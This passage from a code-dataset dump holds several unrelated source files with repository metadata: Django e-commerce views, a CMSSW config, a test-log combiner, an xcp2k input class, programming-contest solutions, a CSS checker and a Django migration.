            "Unknown model name %s, use one of the provided models: %s" % (name, ", ".join(MODELS.keys()))
        )
    model_cls, *pretrained_params = MODELS[name]
    return model_cls.from_pretrained(*pretrained_params, model_dir=model_dir)
| [
"tongsw@mail.ustc.edu.cn"
] | tongsw@mail.ustc.edu.cn |
1737e0ac93fbb31b8c0c2ca19e4a967752a4fe63 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_12779.py | d005d262e57c58ff952354482c61c6a895f0861a | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 94 | py | # mt.exe -inputresource:c:\windows\syswow64\python27.dll;#2 -outputresource:pyodbcconf.pyd;#2
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
65df576fdc5cfc020fcc2a479833143bab79a4c7 | fdb8760664d33626e8cf94330dbaeb639d7ecf84 | /axf/app/views.py | 45c80aac25df5e9f0b3edbb7cbdeffd43a29ff1c | [] | no_license | biaozaidashen/django | ef812494e756a71a8366d58ea285bbf57ee2addb | a1e2aba1d29a415c31b984ec27efbe42d15803ad | refs/heads/master | 2020-03-23T01:37:36.472866 | 2018-08-28T13:02:49 | 2018-08-28T13:02:49 | 140,927,672 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,478 | py | import random
from django.http import HttpResponseRedirect, JsonResponse
from django.shortcuts import render
from app.models import MainWheel, MainNav, MainMustBuy, MainShop, MainShow, FoodType, Goods, CartModel, OrderModel, \
OrderGoodsModel
from django.core.urlresolvers import reverse
from user.models import UserTicketModel
def home(request):
    """Render the landing page: carousel, nav, must-buy, shop and show sections."""
    if request.method == 'GET':
        context = {
            'title': '首页',
            'mainwheels': MainWheel.objects.all(),
            'mainnavs': MainNav.objects.all(),
            'mainmustbuys': MainMustBuy.objects.all(),
            'mainshops': MainShop.objects.all(),
            'mainshows': MainShow.objects.all(),
        }
        return render(request, 'home/home.html', context)
def mine(request):
    """Personal center: show how many orders await payment vs. delivery."""
    if request.method == 'GET':
        orders = OrderModel.objects.filter(user=request.user)
        wait_pay = 0
        payed = 0
        for order in orders:
            if order.o_status == 0:
                wait_pay += 1
            elif order.o_status == 1:
                payed += 1
        context = {
            'wait_pay': wait_pay,  # orders awaiting payment
            'payed': payed,  # orders paid, awaiting delivery
        }
        return render(request, 'mine/mine.html', context)
def market(request):
    """Market entry point: redirect to the default category with default sort."""
    if request.method == 'GET':
        default_params = ('104749', '0', '0')
        return HttpResponseRedirect(reverse('app:market_params', args=default_params))
def user_market(request, typeid, cid, sid):
    """Market listing for one category, optionally narrowed and sorted.

    :param typeid: top-level category id
    :param cid: sub-category id ('0' means all sub-categories)
    :param sid: sort id ('0' default, '1' by sales, '2' price desc, '3' price asc)
    """
    if request.method == 'GET':
        # This page is not behind the login middleware, so resolve the user
        # manually from the ticket cookie.
        ticket = request.COOKIES.get('ticket')
        user_ticket = UserTicketModel.objects.filter(ticket=ticket).first()
        if user_ticket:
            user = user_ticket.user
        else:
            user = ''
        if user:
            user_cart = CartModel.objects.filter(user=user)  # current cart items
        else:
            user_cart = ''
        foodtypes = FoodType.objects.all()
        # Goods of the selected category, optionally narrowed to a sub-category.
        if cid == '0':
            goods = Goods.objects.filter(categoryid=typeid)
        else:
            goods = Goods.objects.filter(categoryid=typeid, childcid=cid)
        # Re-assemble the sub-category string "name:id#name:id#..." into pairs,
        # e.g. [['全部分类', '0'], ['酒类', '13550'], ['饮用水', '15431']].
        # BUG FIX: child_list used to be defined only inside the `if` below,
        # raising NameError when typeid matched no FoodType row.
        child_list = []
        foodtypes_current = foodtypes.filter(typeid=typeid).first()
        if foodtypes_current:
            for childtypename in foodtypes_current.childtypenames.split('#'):
                child_list.append(childtypename.split(':'))
        # Ordering ('0' keeps the default queryset order).
        if sid == '1':
            goods = goods.order_by('productnum')  # by sales volume
        if sid == '2':
            goods = goods.order_by('-price')  # price high -> low
        if sid == '3':
            goods = goods.order_by('price')  # price low -> high
        data = {
            'foodtypes': foodtypes,
            'goods': goods,
            'typeid': typeid,
            'child_list': child_list,
            'cid': cid,
            'user_cart': user_cart,
        }
        return render(request, 'market/market.html', data)
def add_cart(request):
    """AJAX endpoint: add one unit of a product to the current user's cart."""
    if request.method == 'POST':
        user = request.user
        goods_id = request.POST.get('goods_id')
        data = {
            'code': 200,
            'msg': '请求成功'
        }
        # AnonymousUser has no primary key, so `user.id` tells a real login apart.
        if not user.id:
            data['code'] = 403
            data['msg'] = '当前用户没有登录,请去登录'
            return JsonResponse(data)
        # One cart row per product: bump the quantity if it already exists.
        cart_item = CartModel.objects.filter(user=user, goods_id=goods_id).first()
        if cart_item:
            cart_item.c_num += 1
            cart_item.save()
            data['c_num'] = cart_item.c_num
        else:
            CartModel.objects.create(user=user, goods_id=goods_id)
            data['c_num'] = 1
        return JsonResponse(data)
def sub_cart(request):
    """AJAX endpoint: remove one unit of a product; delete the row at zero."""
    if request.method == 'POST':
        data = {
            'code': 200,
            'msg': '请求成功'
        }
        user = request.user
        goods_id = request.POST.get('goods_id')  # supplied by the page JS
        if not user.id:
            data['code'] = 403
            data['msg'] = '当前用户没有登录,请去登录'
            return JsonResponse(data)
        cart_item = CartModel.objects.filter(user=user, goods_id=goods_id).first()
        if cart_item:
            if cart_item.c_num == 1:
                # Last unit: drop the cart row entirely.
                cart_item.delete()
                data['c_num'] = 0
            else:
                cart_item.c_num -= 1
                cart_item.save()
                data['c_num'] = cart_item.c_num
            return JsonResponse(data)
        # Product was not in the cart at all.
        data['c_num'] = 0
        return JsonResponse(data)
def cart(request):
    """Render the shopping-cart page with all cart items of the current user."""
    if request.method == 'GET':
        items = CartModel.objects.filter(user=request.user)
        return render(request, 'cart/cart.html', {'user_carts': items})
def change_select_status(request):
    """AJAX endpoint: toggle the 'selected' checkbox of a single cart item."""
    if request.method == 'POST':
        cart_id = request.POST.get('cart_id')  # cart item id posted by the page JS
        cart = CartModel.objects.filter(id=cart_id).first()
        if cart is None:
            # Robustness fix: a stale or invalid id used to crash with
            # AttributeError on `cart.is_select`; report it instead.
            return JsonResponse({'code': 404, 'msg': '购物车项不存在'})
        cart.is_select = not cart.is_select
        cart.save()
        data = {
            'code': 200,
            'msg': '请求成功',
            'is_select': cart.is_select
        }
        return JsonResponse(data)
def all_select(request):
    """AJAX endpoint: toggle select-all across the whole cart.

    The client posts the current state; the view flips it and applies the
    new state to every cart item, returning the affected ids and the flag.
    """
    if request.method == 'POST':
        user = request.user
        is_select = request.POST.get('all_select')  # current state; '1' initially
        user_carts = CartModel.objects.filter(user=user)
        # Clicking the button inverts the state for everything.
        is_select = '0' if is_select == '1' else '1'
        flag = is_select == '1'
        # Persist the new selection state on every row (the original dead
        # `update(...)` variant has been removed in favor of this loop).
        for item in user_carts:
            item.is_select = flag
            item.save()
        data = {
            'code': 200,
            'ids': [u.id for u in user_carts],
            'flag': flag
        }
        return JsonResponse(data)
def count_price(request):
    """AJAX endpoint: total price of all selected cart items (3 decimals)."""
    if request.method == 'GET':
        selected = CartModel.objects.filter(user=request.user, is_select=True)
        total = 0
        for item in selected:
            total += item.goods.price * item.c_num
        data = {
            'code': 200,
            'count_price': round(total, 3),  # keep three decimal places
            'msg': '请求成功',
        }
        return JsonResponse(data)
def generate_order(request):
    """Place an order from the selected cart items, then show the order page.

    With nothing selected, the user is simply sent back to the cart page.
    """
    if request.method == 'GET':
        user = request.user
        selected_carts = CartModel.objects.filter(user=user, is_select=True)
        if not selected_carts:
            # Can't place an empty order.
            return render(request, 'cart/cart.html')
        alphabet = 'sdgdyettfyhsygdvysfv134311345568'
        # 30-character pseudo-random order number.
        o_num = ''.join(random.choice(alphabet) for _ in range(30))
        order = OrderModel.objects.create(user=user, o_num=o_num)
        for item in selected_carts:
            # Link each purchased product to the order with its quantity.
            OrderGoodsModel.objects.create(goods=item.goods, order=order, goods_num=item.c_num)
        # The items are now part of the order; empty them from the cart.
        selected_carts.delete()
        return render(request, 'order/order_info.html', {'order': order})
def change_order_status(request):
    """AJAX endpoint: mark an order as paid (o_status 0 -> 1)."""
    if request.method == 'POST':
        order_id = request.POST.get('order_id')
        OrderModel.objects.filter(id=order_id).update(o_status=1)
        payload = {'code': 200, 'msg': '请求成功'}
        return JsonResponse(payload)
def order_wait_pay(request):
    """List the current user's unpaid orders (o_status == 0)."""
    if request.method == 'GET':
        pending = OrderModel.objects.filter(user=request.user, o_status=0)
        return render(request, 'order/order_list_wait_pay.html', {'orders': pending})
def wait_pay_to_payed(request):
    """Jump from the unpaid-order list to the payment page for one order."""
    if request.method == 'GET':
        order_id = request.GET.get('order_id')
        order = OrderModel.objects.filter(id=order_id).first()
        return render(request, 'order/order_info.html', {'order': order})
def order_payed(request):
    """List the current user's paid orders awaiting delivery (o_status == 1)."""
    if request.method == 'GET':
        paid_orders = OrderModel.objects.filter(user=request.user, o_status=1)
        return render(request, 'order/order_list_payed.html', {'orders': paid_orders})
| [
"you@example.com"
] | you@example.com |
512aa69661fa13678466cf8017c83fe50756b7f7 | cdad738a7085a997b5349a94aedb4db8da78da8f | /PythiaCumulant/test/ConfFile_cfg.py | ed16acb4b043e5f41fcc0791745c74b0c6c9bde2 | [
"MIT"
] | permissive | tuos/DirectLoopAnalysis | 4851d122d4723e498705c1d2cb100cbf3eda8d43 | 6f5f02538454d2240d0232665b9b17d07eb79854 | refs/heads/master | 2020-06-12T22:24:01.081755 | 2020-01-21T17:49:37 | 2020-01-21T17:49:37 | 194,446,479 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 771 | py | import FWCore.ParameterSet.Config as cms
# CMSSW configuration: run the PythiaCumulant analyzer over a GEN ROOT file.
process = cms.Process("Demo")
process.load("FWCore.MessageService.MessageLogger_cfi")
# Process only the first 10 events; set to -1 to run over the whole file.
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(10) )
process.source = cms.Source("PoolSource",
    # replace 'myfile.root' with the source file you want to use
    fileNames = cms.untracked.vstring(
        'file:/afs/cern.ch/user/t/tuos/work/private/cumulant/loops/CMSSW_9_4_6_patch1/src/PythiaCumulant/PythiaCumulant/test/F2D718DA-3361-E811-B68C-0CC47ABB5178.root'
    )
)
process.demo = cms.EDAnalyzer('PythiaCumulant',
    src = cms.untracked.InputTag("generator"),
    #src = cms.untracked.InputTag("generatorSmeared"),
    genParticleSrc = cms.untracked.InputTag("genParticles")
)
# Single-path schedule: just run the analyzer.
process.p = cms.Path(process.demo)
"shengquan.tuo@cern.ch"
] | shengquan.tuo@cern.ch |
9414a6701142d165a30eef94ccded064ddac92a6 | 37cfcdfa3b8f1499f5899d2dfa2a48504a690abd | /test/functional/combine_logs.py | 21e10d9f491b8b44f266a6f5a821e7b93491b7ff | [
"MIT"
] | permissive | CJwon-98/Pyeongtaekcoin | 28acc53280be34b69c986198021724181eeb7d4d | 45a81933a98a7487f11e57e6e9315efe740a297e | refs/heads/master | 2023-08-17T11:18:24.401724 | 2021-10-14T04:32:55 | 2021-10-14T04:32:55 | 411,525,736 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,352 | py | #!/usr/bin/env python3
"""Combine logs from multiple pyeongtaekcoin nodes as well as the test_framework log.
This streams the combined log output to stdout. Use combine_logs.py > outputfile
to write to an outputfile.
If no argument is provided, the most recent test directory will be used."""
import argparse
from collections import defaultdict, namedtuple
import heapq
import itertools
import os
import re
import sys
import tempfile
# N.B.: don't import any local modules here - this script must remain executable
# without the parent module installed.
# Should match same symbol in `test_framework.test_framework`.
TMPDIR_PREFIX = "pyeongtaekcoin_func_test_"
# Matches on the date format at the start of the log event
TIMESTAMP_PATTERN = re.compile(r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(\.\d{6})?Z")
# One parsed log record: ISO timestamp, originating log ("test"/"nodeN"), full text.
LogEvent = namedtuple('LogEvent', ['timestamp', 'source', 'event'])
def main():
    """Main function. Parses args, reads the log files and renders them as text or html."""
    parser = argparse.ArgumentParser(
        description=__doc__, formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument(
        'testdir', nargs='?', default='',
        help=('temporary test directory to combine logs from. '
              'Defaults to the most recent'))
    parser.add_argument('-c', '--color', dest='color', action='store_true', help='outputs the combined log with events colored by source (requires posix terminal colors. Use less -r for viewing)')
    parser.add_argument('--html', dest='html', action='store_true', help='outputs the combined log as html. Requires jinja2. pip install jinja2')
    args = parser.parse_args()
    # ANSI color output and HTML output are mutually exclusive render modes.
    if args.html and args.color:
        print("Only one out of --color or --html should be specified")
        sys.exit(1)
    # Fall back to the most recently modified test tmp directory.
    testdir = args.testdir or find_latest_test_dir()
    if not testdir:
        print("No test directories found")
        sys.exit(1)
    if not args.testdir:
        print("Opening latest test directory: {}".format(testdir), file=sys.stderr)
    log_events = read_logs(testdir)
    print_logs(log_events, color=args.color, html=args.html)
def read_logs(tmp_dir):
    """Reads log files.

    Delegates to generator function get_log_events() to provide individual log events
    for each of the input log files, merged in timestamp order."""
    sources = [("test", "%s/test_framework.log" % tmp_dir)]
    # Probe node0, node1, ... until a debug.log is missing.
    for node_index in itertools.count():
        node_log = "{}/node{}/regtest/debug.log".format(tmp_dir, node_index)
        if not os.path.isfile(node_log):
            break
        sources.append(("node%d" % node_index, node_log))
    event_streams = [get_log_events(label, path) for label, path in sources]
    return heapq.merge(*event_streams)
def find_latest_test_dir():
    """Returns the latest tmpfile test directory prefix."""
    tmpdir = tempfile.gettempdir()

    def is_candidate(basename):
        # Must be a readable directory whose name carries the test prefix.
        full_path = os.path.join(tmpdir, basename)
        return (os.path.isdir(full_path)
                and basename.startswith(TMPDIR_PREFIX)
                and os.access(full_path, os.R_OK))

    candidates = [os.path.join(tmpdir, entry)
                  for entry in os.listdir(tmpdir) if is_candidate(entry)]
    if not candidates:
        return None
    return max(candidates, key=os.path.getmtime)
def get_log_events(source, logfile):
    """Generator function that returns individual log events.

    Log events may be split over multiple lines. We use the timestamp
    regex match as the marker for a new log event."""
    try:
        with open(logfile, 'r', encoding='utf-8') as infile:
            event = ''
            timestamp = ''
            for line in infile:
                # skip blank lines
                if line == '\n':
                    continue
                # if this line has a timestamp, it's the start of a new log event.
                time_match = TIMESTAMP_PATTERN.match(line)
                if time_match:
                    if event:
                        yield LogEvent(timestamp=timestamp, source=source, event=event.rstrip())
                    timestamp = time_match.group()
                    if time_match.group(1) is None:
                        # timestamp does not have microseconds. Add zeroes.
                        # (LogEvent tuples compare by timestamp first, so a uniform
                        # precision keeps heapq.merge ordering consistent.)
                        timestamp_micro = timestamp.replace("Z", ".000000Z")
                        line = line.replace(timestamp, timestamp_micro)
                        timestamp = timestamp_micro
                    event = line
                # if it doesn't have a timestamp, it's a continuation line of the previous log.
                else:
                    # Add the line. Prefix with space equivalent to the source + timestamp so log lines are aligned
                    event += " " + line
            # Flush the final event
            yield LogEvent(timestamp=timestamp, source=source, event=event.rstrip())
    except FileNotFoundError:
        print("File %s could not be opened. Continuing without it." % logfile, file=sys.stderr)
def print_logs(log_events, color=False, html=False):
    """Renders the iterator of log events into text or html.

    In text mode, each event is prefixed with its source label; with
    ``color=True`` the first four nodes and the test log each get a
    distinct ANSI color. In html mode the events are rendered through
    the jinja2 template ``combined_log_template.html`` (jinja2 must be
    installed; the current working directory is the template root)."""
    if not html:
        # defaultdict means unknown sources simply get no color codes.
        colors = defaultdict(lambda: '')
        if color:
            colors["test"] = "\033[0;36m"   # CYAN
            colors["node0"] = "\033[0;34m"  # BLUE
            colors["node1"] = "\033[0;32m"  # GREEN
            colors["node2"] = "\033[0;31m"  # RED
            colors["node3"] = "\033[0;33m"  # YELLOW
            colors["reset"] = "\033[0m"     # Reset font color
        for event in log_events:
            lines = event.event.splitlines()
            # First line carries the source column; continuation lines are
            # printed with only the color wrapping.
            print("{0} {1: <5} {2} {3}".format(colors[event.source.rstrip()], event.source, lines[0], colors["reset"]))
            if len(lines) > 1:
                for line in lines[1:]:
                    print("{0}{1}{2}".format(colors[event.source.rstrip()], line, colors["reset"]))
    else:
        try:
            import jinja2
        except ImportError:
            print("jinja2 not found. Try `pip install jinja2`")
            sys.exit(1)
        # Fully materializes log_events (it may be a generator) for the template.
        print(jinja2.Environment(loader=jinja2.FileSystemLoader('./'))
              .get_template('combined_log_template.html')
              .render(title="Combined Logs from testcase", log_events=[event._asdict() for event in log_events]))
if __name__ == '__main__':
main()
| [
"cjone98692996@gmail.com"
] | cjone98692996@gmail.com |
500dad7ffb9764ef76085a688676e4c8740d9482 | 1a59a9076c1e9f1eb98e24ff41a4c1c95e2b353e | /xcp2k/classes/_mm1.py | c5b93af6d2c6b11ace7e30bed1ee50a1f93ba2cc | [] | no_license | Roolthasiva/xcp2k | 66b2f30ebeae1a946b81f71d22f97ea4076e11dc | fc3b5885503c6f6dc549efeb4f89f61c8b6b8242 | refs/heads/master | 2022-12-23T06:03:14.033521 | 2020-10-07T08:01:48 | 2020-10-07T08:01:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,236 | py | from xcp2k.inputsection import InputSection
from xcp2k.classes._forcefield1 import _forcefield1
from xcp2k.classes._neighbor_lists5 import _neighbor_lists5
from xcp2k.classes._poisson2 import _poisson2
from xcp2k.classes._periodic_efield2 import _periodic_efield2
from xcp2k.classes._print44 import _print44
class _mm1(InputSection):
    """Generated wrapper for the CP2K ``MM`` input section.

    Holds the fixed subsections (FORCEFIELD, NEIGHBOR_LISTS, POISSON,
    PRINT) plus a repeatable list of PERIODIC_EFIELD subsections.
    NOTE(review): this module looks auto-generated from the CP2K input
    schema — edit the generator rather than this file."""
    def __init__(self):
        InputSection.__init__(self)
        self.FORCEFIELD = _forcefield1()
        self.NEIGHBOR_LISTS = _neighbor_lists5()
        self.POISSON = _poisson2()
        self.PERIODIC_EFIELD_list = []
        self.PRINT = _print44()
        self._name = "MM"
        # Maps attribute names to CP2K section keywords for serialization.
        self._subsections = {'FORCEFIELD': 'FORCEFIELD', 'NEIGHBOR_LISTS': 'NEIGHBOR_LISTS', 'POISSON': 'POISSON', 'PRINT': 'PRINT'}
        self._repeated_subsections = {'PERIODIC_EFIELD': '_periodic_efield2'}
        self._attributes = ['PERIODIC_EFIELD_list']
    def PERIODIC_EFIELD_add(self, section_parameters=None):
        """Append a new PERIODIC_EFIELD subsection and return it.

        ``section_parameters`` is assigned only if the generated section
        class actually exposes a ``Section_parameters`` attribute."""
        new_section = _periodic_efield2()
        if section_parameters is not None:
            if hasattr(new_section, 'Section_parameters'):
                new_section.Section_parameters = section_parameters
        self.PERIODIC_EFIELD_list.append(new_section)
        return new_section
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
f1a26d8535ee4e801718164bb5381dda69821129 | a9fe1b5c320cdef138ac4a942a8b741c7f27de7c | /LC1165-Single-Row-Keyboard.py | b61ee59f2cb456449c1170110439d12eae92960f | [] | no_license | kate-melnykova/LeetCode-solutions | a6bbb5845310ce082770bcb92ef6f6877962a8ee | ee8237b66975fb5584a3d68b311e762c0462c8aa | refs/heads/master | 2023-06-28T06:35:33.342025 | 2021-07-30T06:59:31 | 2021-07-30T06:59:31 | 325,106,033 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,221 | py | """
There is a special keyboard with all keys in a single row.
Given a string keyboard of length 26 indicating the layout of
the keyboard (indexed from 0 to 25), initially your finger is
at index 0. To type a character, you have to move your finger
to the index of the desired character. The time taken to move
your finger from index i to index j is |i - j|.
You want to type a string word. Write a function to calculate
how much time it takes to type it with one finger.
Example 1:
Input: keyboard = "abcdefghijklmnopqrstuvwxyz", word = "cba"
Output: 4
Explanation: The index moves from 0 to 2 to write 'c' then to 1
to write 'b' then to 0 again to write 'a'.
Total time = 2 + 1 + 1 = 4.
Example 2:
Input: keyboard = "pqrstuvwxyzabcdefghijklmno", word = "leetcode"
Output: 73
Constraints:
(*) keyboard.length == 26
(*) keyboard contains each English lowercase letter exactly once in some order.
(*) 1 <= word.length <= 10^4
(*) word[i] is an English lowercase letter.
"""
class Solution:
    def calculateTime(self, keyboard: str, word: str) -> int:
        """Total finger travel, using a precomputed letter -> index map.

        Runtime complexity: O(n)
        Space complexity: O(n)
        """
        index_of = {letter: pos for pos, letter in enumerate(keyboard)}
        total = 0
        finger = 0
        for letter in word:
            target = index_of[letter]
            total += abs(finger - target)
            finger = target
        return total

    def calculateTimeNoSpace(self, keyboard: str, word: str) -> int:
        """Total finger travel without the auxiliary map.

        Runtime complexity: O(n^2)
        Space complexity: O(1)
        """
        self.keyboard = keyboard
        total, finger = 0, 0
        for letter in word:
            target = self._get_loc(letter)
            total += abs(finger - target)
            finger = target
        return total

    def _get_loc(self, char: str):
        # Linear scan of the layout for this key's position.
        return self.keyboard.index(char)
if __name__ == '__main__':
from run_tests import run_tests
correct_answers = [
["abcdefghijklmnopqrstuvwxyz", "cba", 4],
["pqrstuvwxyzabcdefghijklmno", "leetcode", 73]
]
methods = ['calculateTime', 'calculateTimeNoSpace']
for method in methods:
print(f'Running tests for {method}')
run_tests(getattr(Solution(), method), correct_answers) | [
"forkatemelnikova@gmail.com"
] | forkatemelnikova@gmail.com |
d710e3ef0ea5e49cc3e3ccc4c458b75b14108bf1 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03062/s886815102.py | 0d88d0f6b8fc038f5e52c29a4351c0e0d7bc5afb | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 223 | py | def main():
n=int(input())
a=list(map(int,input().split()))
dp=[0,-10**18]
for i in range(n-1):
dp2=[max(dp[0]+a[i],dp[1]-a[i]),max(dp[0]-a[i],dp[1]+a[i])]
dp=dp2
print(max(dp[0]+a[-1],dp[1]-a[-1]))
main() | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
371d66ddc5a6c081888fb63f8a81dac1623b1f4d | d3e4c3527884f28ac554c9a919b4859a4fb21a7a | /ckstyle/CssCheckerWrapper.py | 5d86c4842c7202e70c9958514c6b8432ece320fa | [
"BSD-3-Clause"
] | permissive | kxws888/CSSCheckStyle | 4032ca1d2b86d5ac85613bc17125389361678bfc | 4b4b89495fd8bb6a211d22a559e76032cd1b860c | refs/heads/master | 2021-01-16T19:39:23.440607 | 2012-11-09T03:37:44 | 2012-11-09T03:37:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,836 | py | #/usr/bin/python
#encoding=utf-8
import os
from plugins.Base import *
class CssChecker():
    '''CSS checker class; relies on a CSS parser as its backend.'''
    def __init__(self, parser, config = None):
        self.parser = parser
        self.config = config
        # Collected messages; log is level 2, warn is level 1, error is level 0
        self.logMsgs = []
        self.warningMsgs = []
        self.errorMsgs = []
        # Extra messages, e.g. internal errors of the tool itself
        self.extraMsgs = []
        # Registered checkers of each kind (all loaded from the plugins directory)
        self.ruleSetCheckers = []
        self.ruleCheckers = []
        self.styleSheetCheckers = []
        # If the parse phase produced errors, record those first
        self.handleParseErrors()
    def getStyleSheet(self):
        '''Return a reference to the parsed styleSheet.'''
        return self.parser.styleSheet
    def handleParseErrors(self):
        # Each parse error is a (level, message) pair.
        for msg in self.parser.getParseErrors():
            self.remember(msg[0], msg[1])
    def hasError(self):
        '''Return True if any message (log/warning/error) was recorded.'''
        return len(self.logMsgs) != 0 or len(self.warningMsgs) != 0 or len(self.errorMsgs) != 0
    def errors(self):
        '''Export the recorded messages as (logs, warnings, errors).'''
        return self.logMsgs, self.warningMsgs, self.errorMsgs
    def loadPlugins(self, pluginDir):
        '''Dynamically load checker classes from the plugins directory.

        Each plugin file must define a class with the same name as the
        file; plugins are filtered by the config's include/exclude id
        lists, and plugins whose errorMsg contains ";" or a newline are
        rejected.'''
        # ids = {}
        include = self.config.include
        exclude = self.config.exclude
        for filename in os.listdir(pluginDir):
            # Skip non-Python files and private modules.
            if not filename.endswith('.py') or filename.startswith('_'):
                continue
            # Base.py / helper.py are infrastructure, not checkers.
            if filename == 'Base.py' or filename == 'helper.py':
                continue
            pluginName = os.path.splitext(filename)[0]
            # Import the plugin module
            plugin = __import__("ckstyle.plugins." + pluginName, fromlist = [pluginName])
            pluginClass = None
            if hasattr(plugin, pluginName):
                pluginClass = getattr(plugin, pluginName)
            else:
                print '[TOOL] class %s should exist in %s.py' % (pluginName, pluginName)
                continue
            # Instantiate the plugin class
            instance = pluginClass()
            # ids[instance.id] = pluginName
            if include != 'all' and include.find(instance.id) == -1:
                continue
            elif exclude != 'none' and exclude.find(instance.id) != -1:
                continue
            if instance.errorMsg.find(';') != -1 or instance.errorMsg.find('\n') != -1:
                print r'[TOOL] errorMsg should not contain ";" or "\n" in %s.py' % pluginName
                continue
            # Register it with the matching checker list
            self.registerChecker(instance)
    def registerChecker(self, checker):
        '''Dispatch the checker to the proper list based on its type.'''
        if isinstance(checker, RuleChecker):
            self.registerRuleChecker(checker)
        elif isinstance(checker, RuleSetChecker):
            self.registerRuleSetChecker(checker)
        else:
            self.registerStyleSheetChecker(checker)
    def registerStyleSheetChecker(self, checker):
        self.styleSheetCheckers.append(checker)
    def registerRuleSetChecker(self, checker):
        self.ruleSetCheckers.append(checker)
    def registerRuleChecker(self, checker):
        self.ruleCheckers.append(checker)
    def remember(self, errorLevel, errorMsg):
        '''Record one problem found in the code.

        Logs/warnings are only kept when the configured errorLevel is
        high enough; errors are always kept.'''
        if errorLevel == ERROR_LEVEL.LOG:
            if self.config.errorLevel > 1:
                self.logMsgs.append(errorMsg)
        elif errorLevel == ERROR_LEVEL.WARNING:
            if self.config.errorLevel > 0:
                self.warningMsgs.append(errorMsg)
        elif errorLevel == ERROR_LEVEL.ERROR:
            self.errorMsgs.append(errorMsg)
        else:
            print '[TOOL] wrong ErrorLevel for ' + errorMsg
    def logStyleSheetMessage(self, checker, styleSheet):
        '''Record a problem found at StyleSheet level.

        Substitutes ${file} in the checker's message, or appends the
        file name when the placeholder is absent.'''
        errorLevel = checker.getLevel()
        errorMsg = checker.getMsg()
        if errorMsg is None or errorMsg == '':
            print '[TOOL] no errorMsg in your plugin, please check it'
        if errorMsg.find('${file}') == -1:
            errorMsg = errorMsg + ' (from "' + styleSheet.getFile() + '")'
        else:
            errorMsg = errorMsg.replace('${file}', styleSheet.getFile())
        self.remember(errorLevel, errorMsg);
    def logRuleMessage(self, checker, rule):
        '''Record a problem found in a single key/value rule.

        Substitutes ${selector}, ${name} and ${value} placeholders.'''
        errorLevel = checker.getLevel()
        errorMsg = checker.getMsg()
        if errorMsg is None or errorMsg == '':
            print '[TOOL] no errorMsg in your plugin, please check it'
        if errorMsg.find('${selector}') == -1:
            errorMsg = errorMsg + ' (from "' + rule.selector + '")'
        else:
            errorMsg = errorMsg.replace('${selector}', rule.selector)
        errorMsg = errorMsg.replace('${name}', rule.roughName.strip())
        errorMsg = errorMsg.replace('${value}', rule.value.strip())
        self.remember(errorLevel, errorMsg);
    def logRuleSetMessage(self, checker, ruleSet):
        '''Record a problem found in a rule set (selector block).'''
        errorLevel = checker.getLevel()
        errorMsg = checker.getMsg()
        if errorMsg.find('${selector}') == -1:
            errorMsg = errorMsg + ' (from "' + ruleSet.selector + '")'
        else:
            errorMsg = errorMsg.replace('${selector}', ruleSet.selector)
        self.remember(errorLevel, errorMsg);
    def doCheck(self):
        '''Run all registered checkers over the parsed stylesheet.'''
        # Rule sets to ignore (currently only unit-test selectors)
        ignoreRuleSets = self.config.ignoreRuleSets
        def findInArray(array, value):
            for x in array:
                if x == value:
                    return True
            return False
        # Check one rule set
        def checkRuleSet(ruleSet):
            for checker in self.ruleSetCheckers:
                if not checker.check(ruleSet):
                    self.logRuleSetMessage(checker, ruleSet)
        # Check every rule inside a rule set
        def checkRule(ruleSet):
            for checker in self.ruleCheckers:
                for rule in ruleSet._rules:
                    if not checker.check(rule):
                        self.logRuleMessage(checker, rule)
        # Check the stylesheet as a whole
        styleSheet = self.parser.styleSheet
        for checker in self.styleSheetCheckers:
            if not checker.check(styleSheet):
                self.logStyleSheetMessage(checker, styleSheet)
        for ruleSet in styleSheet.getRuleSets():
            # Skip rule sets that are configured to be ignored
            if findInArray(ignoreRuleSets, ruleSet.selector):
                continue
            checkRuleSet(ruleSet)
            checkRule(ruleSet)
| [
"wangjeaf@gmail.com"
] | wangjeaf@gmail.com |
79e9eb04ba894732a459e4b01ae2261d362576b6 | 0639b8366a5ec5b65fa2097354eafd5a1f73ad0f | /hoodalert/migrations/0004_rename_post_posts_description.py | a95d995b2021efa24eef56d75d243980d8350f44 | [
"MIT"
] | permissive | COdingaorg/Neighbourhood_Alert | cc27a32af7df070f9d49380c4d3f0067f8535668 | 44e202469b4a2410d1dab2244e62915575f8ea84 | refs/heads/main | 2023-06-20T20:38:19.301358 | 2021-07-27T22:36:34 | 2021-07-27T22:36:34 | 388,885,612 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | # Generated by Django 3.2.4 on 2021-07-25 21:22
from django.db import migrations
class Migration(migrations.Migration):
    """Rename Posts.post to Posts.description (schema-only change)."""

    dependencies = [
        ('hoodalert', '0003_rename_location_business_location_or_description'),
    ]

    operations = [
        migrations.RenameField(
            model_name='posts',
            old_name='post',
            new_name='description',
        ),
    ]
| [
